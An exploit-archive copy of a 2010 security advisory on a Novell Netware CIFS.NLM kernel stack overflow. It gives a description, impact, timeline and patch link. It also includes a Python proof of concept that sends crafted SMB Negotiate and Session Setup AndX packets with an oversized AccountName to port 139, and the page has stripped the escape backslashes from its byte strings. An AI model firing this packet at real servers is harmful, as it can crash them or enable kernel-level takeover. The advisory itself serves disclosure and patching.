Home / os / win7

Netware SMB Remote Stack Overflow PoC

Posted on 17 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Netware SMB Remote Stack Overflow PoC</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=====================================
Netware SMB Remote Stack Overflow PoC
=====================================


Title:           Netware SMB Remote Stack Overflow
Version:         1.0
Issue type:      Stack Overflow
Affected vendor: Novell
Release date:    17/06/2010
Discovered by:   Laurent Gaffi?
Issue status:    Patch available
 
===============================================================================
 
Summary
-------
 
A vulnerability exists in the Netware CIFS.NLM driver which allows an attacker
to trigger a kernel stack overflow by sending a specific 'Sessions Setup AndX'
query. Successful exploitation of this issue will result in remote code
execution with kernel privileges. Failed attempts may result in a remote denial
of service.
 
 
Description
-----------
The Server Message Block (SMB) protocol, also known as Common Internet File
System (CIFS) acts as an application-layer protocol to provide shared access
to files, printers and Inter-Process Communication (IPC). It is also a transport
for Distributed Computing Environment / Remote Procedure Call (DCE / RPC)
operations.After negotiating a SMB communication the client sends a
'Session Setup AndX' packet to negotiate a session, to be able to connect on a
specific share. By sending a specially crafted request packet containing a long
'AccountName' value, it is possible trigger a kernel stack overflow.
 
 
Impact
------
 
A remote attacker may be able to remotely execute code with kernel privileges
on affected Netware systems. Failed attempts will result in a denial of service.
 
 
Affected products
-----------------
 
Netware version 6.5 SP8 and prior.
 
 
Proof of concept
----------------
 
import sys,socket
from socket import *
 
if len(sys.argv)&lt;=1:   
 sys.exit('usage: python netware.py IP_ADDR')
 
host = sys.argv[1],139
payload = &quot;A&quot; * 200
 
packetnego=(
&quot;x00x00x00x9a&quot;
&quot;xffx53x4dx42x72x00x00x08x00x00x00x00x00x00x00&quot;
&quot;x00x00x00x00x00x00x00x00x00x00x00xc3x15x00x00&quot;
&quot;x01x3dx00x77x00x02x50x43x20x4ex45x54x57x4fx52&quot;
&quot;x4bx20x50x52x4fx47x52x41x4dx20x31x2ex30x00x02&quot;
&quot;x4dx49x43x52x4fx53x4fx46x54x20x4ex45x54x29x4f&quot;
&quot;x52x4bx53x20x33x2ex30x00x02x44x4fx53x20x4cx4d&quot;
&quot;x31x2ex32x58x30x30x32x00x02x44x4fx53x20x4cx41&quot;
&quot;x4ex4dx20x4ex32x2ex31x00x02x57x69x6ex64x6fx77&quot;
&quot;x73x20x66x6fx72x20x57x6fx72x6bx67x72x6fx75x70&quot;
&quot;x73x20x33x2ex31x61x00x02x4ex54x20x4cx4dx20x30&quot;
&quot;x2ex31x32x00&quot;
)
 
packetsession=(
&quot;x00x00x01x3e&quot;
&quot;xffx53x4dx42x73x00x00x00x00x10x00x00x00x00x00x00&quot;
&quot;x00x00x00x00x00x00x00x00x00x00xf9x19x01x00x81x61&quot;
&quot;x0dx75x00x7ax00x68x0bx32x00x00x00x00x00x00x00x18&quot;
&quot;x00x00x00x00x00x00x00x04x00x00x00x3dx00x28xd4xce&quot;
&quot;xd7x93xc8x8bx16x5fx42x2ax7axfdx15x7axfdx15x7axfd&quot;+payload+
&quot;xefxa5x42x5ex5cx2dx4bx1ax1cx59x4fx00x57x4fx52x4b&quot;
&quot;x47x52x4fx55x50x00x57x69x6ex64x6fx77x73x20x34x2e&quot;
&quot;x30x00x57x69x6ex64x6fx77x73x20x34x2ex30x00x04xff&quot;
&quot;x00x00x00x02x00x01x00x1fx00x00x5cx5cx57x49x4ex2d&quot;
&quot;x45x37x4ax30x4fx4ex49x4dx53x45x33x5cx55x53x45x52&quot;
&quot;x53x00x3fx3fx3fx3fx3fx00&quot;
)
 
## chained Session Setup Andx, tree connect command, field = username, basic stack overflow.
 
s = socket(AF_INET, SOCK_STREAM)
s.connect(host)
s.send(''.join(packetnego))
s.send(''.join(packetsession))
print &quot;done !&quot;
 
 
Solution
--------
 
Apply NSS update located at:
* http://download.novell.com/Download?buildid=tMWCI1cdI7s~
 
This patch has not been verified by stratsec.
 
 
Response timeline
-----------------
 
* 07/02/2010 - Issue discovered.
* 10/02/2010 - Vendor notified.
* 10/02/2010 - Vendor acknowledged receipt of advisory.
* 11/02/2010 - Vendor confirmed issue presence.
* 16/06/2010 - Patch released by vendor.
* 17/06/2010 - stratsec advisory published.
 
References
----------
 
* Vendor advisory: http://download.novell.com/Download?buildid=tMWCI1cdI7s~


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-17]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP